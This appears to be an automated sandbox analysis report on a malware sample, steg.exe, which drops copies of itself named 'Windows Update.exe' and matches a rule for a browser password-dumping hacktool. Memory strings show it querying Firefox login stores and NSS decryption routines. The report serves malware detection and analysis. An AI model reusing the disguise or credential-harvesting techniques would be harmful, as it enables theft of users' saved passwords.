                                Source: 4.0.Windows Update.exe.1b377.7.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.10.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.2.steg.exe.100d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.1.Windows Update.exe.1b377.0.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.2.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.b4d97c.4.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.1.Windows Update.exe.9d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.0.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.1.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.2.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.2.Windows Update.exe.b4d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.0.WindowsUpdate.exe.34d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.2.steg.exe.f8b377.2.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.1b377.11.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.5.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.5.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.0.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.10.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.5.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 12.2.WindowsUpdate.exe.34d97c.1.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.0.Windows Update.exe.9d97c.8.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: SecurityXploded_Producer_String date = 2017-07-13, author = Florian Roth, description = Detects hacktools by SecurityXploded, reference = http://securityxploded.com/browser-password-dump.php, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 00B2EC57 appears 43 times
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 0007EC57 appears 38 times
                                Source: C:\Users\user\Desktop\steg.exeCode function: String function: 00FEEC57 appears 43 times
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: String function: 0032EC57 appears 43 times
                                Source: steg.exeBinary or memory string: OriginalFilename vs steg.exe
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe, vs steg.exe
                                Source: steg.exe, 00000000.00000002.282881047.000000000177A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs steg.exe
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe, vs steg.exe
                                Source: steg.exeBinary or memory string: OriginalFilenameStub.exe, vs steg.exe
                                Source: steg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\steg.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/15@9/3
                                Source: C:\Users\user\Desktop\steg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 4.0.Windows Update.exe.10000.6.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: steg.exe, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 4.0.Windows Update.exe.10000.9.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 4.2.Windows Update.exe.10000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: Windows Update.exe.0.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: WindowsUpdate.exe.4.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 0.2.steg.exe.f80000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 0.0.steg.exe.f80000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 4.0.Windows Update.exe.10000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: 4.0.Windows Update.exe.10000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                Source: steg.exeVirustotal: Detection: 71%
                                Source: steg.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\Desktop\steg.exeFile read: C:\Users\user\Desktop\steg.exeJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\steg.exe "C:\Users\user\Desktop\steg.exe"
                                Source: C:\Users\user\Desktop\steg.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2708
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2676
                                Source: C:\Users\user\Desktop\steg.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2708Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2676Jump to behavior
                                Source: C:\Users\user\Desktop\steg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_05523C92 AdjustTokenPrivileges,14_2_05523C92
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_05523C5B AdjustTokenPrivileges,14_2_05523C5B
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\Desktop\steg.exeFile created: C:\Users\user\AppData\Local\Temp\SysInfo.txtJump to behavior
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Windows Update.exe, 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: select * from logins where blacklisted_by_user=0;
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Windows Update.exe, 00000004.00000001.280458737.0000000000012000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: select * from moz_logins;/signons.txt/signons2.txt/signons3.txt\signons.sqlite#2c#2d---nss3.dllNSS_InitNSS_ShutdownPK11_GetInternalKeySlotPK11_FreeSlotPK11_AuthenticatePK11SDR_DecryptPK11_CheckUserPassword0
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Windows Update.exe, 0000000E.00000003.351328752.0000000007544000.00000004.00000800.00020000.00000000.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: select * from moz_logins;
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: C:\Users\user\Desktop\steg.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
